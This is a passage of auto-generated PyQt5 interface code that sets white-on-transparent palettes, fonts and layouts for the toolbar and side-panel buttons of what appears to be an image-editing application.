brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_open.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_open.setFont(font)
self.btn_open.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_open.setObjectName("btn_open")
self.horizontalLayout_3.addWidget(self.btn_open)
self.btn_save = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_save.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_save.setFont(font)
self.btn_save.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_save.setObjectName("btn_save")
self.horizontalLayout_3.addWidget(self.btn_save)
self.btn_undo = QtWidgets.QToolButton(self.operation)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_undo.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_undo.setFont(font)
self.btn_undo.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_undo.setObjectName("btn_undo")
self.horizontalLayout_3.addWidget(self.btn_undo)
self.horizontalLayout_4.addWidget(self.operation)
spacerItem = QtWidgets.QSpacerItem(100, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem)
self.control = QtWidgets.QFrame(self.title)
self.control.setMinimumSize(QtCore.QSize(0, 45))
self.control.setMaximumSize(QtCore.QSize(120, 45))
self.control.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.control.setFrameShadow(QtWidgets.QFrame.Raised)
self.control.setObjectName("control")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.control)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btn_confirm = QtWidgets.QToolButton(self.control)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_confirm.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_confirm.setFont(font)
self.btn_confirm.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_confirm.setObjectName("btn_confirm")
self.horizontalLayout_2.addWidget(self.btn_confirm)
self.btn_cancel = QtWidgets.QToolButton(self.control)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_cancel.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_cancel.setFont(font)
self.btn_cancel.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_cancel.setObjectName("btn_cancel")
self.horizontalLayout_2.addWidget(self.btn_cancel)
self.horizontalLayout_4.addWidget(self.control)
self.verticalLayout_3.addWidget(self.title)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame_4 = QtWidgets.QFrame(self.centralwidget)
self.frame_4.setMinimumSize(QtCore.QSize(90, 0))
self.frame_4.setMaximumSize(QtCore.QSize(90, 16777215))
self.frame_4.setStyleSheet("background: rgb(51, 51, 51)")
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.frame_5 = QtWidgets.QFrame(self.frame_4)
self.frame_5.setGeometry(QtCore.QRect(10, 0, 56, 500))
self.frame_5.setMinimumSize(QtCore.QSize(0, 500))
self.frame_5.setMaximumSize(QtCore.QSize(16777215, 500))
self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_5.setObjectName("frame_5")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_5)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.btn_clip = QtWidgets.QPushButton(self.frame_5)
self.btn_clip.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_clip.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_clip.setFont(font)
self.btn_clip.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_clip.setObjectName("btn_clip")
self.verticalLayout_2.addWidget(self.btn_clip)
self.btn_lightness = QtWidgets.QToolButton(self.frame_5)
self.btn_lightness.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
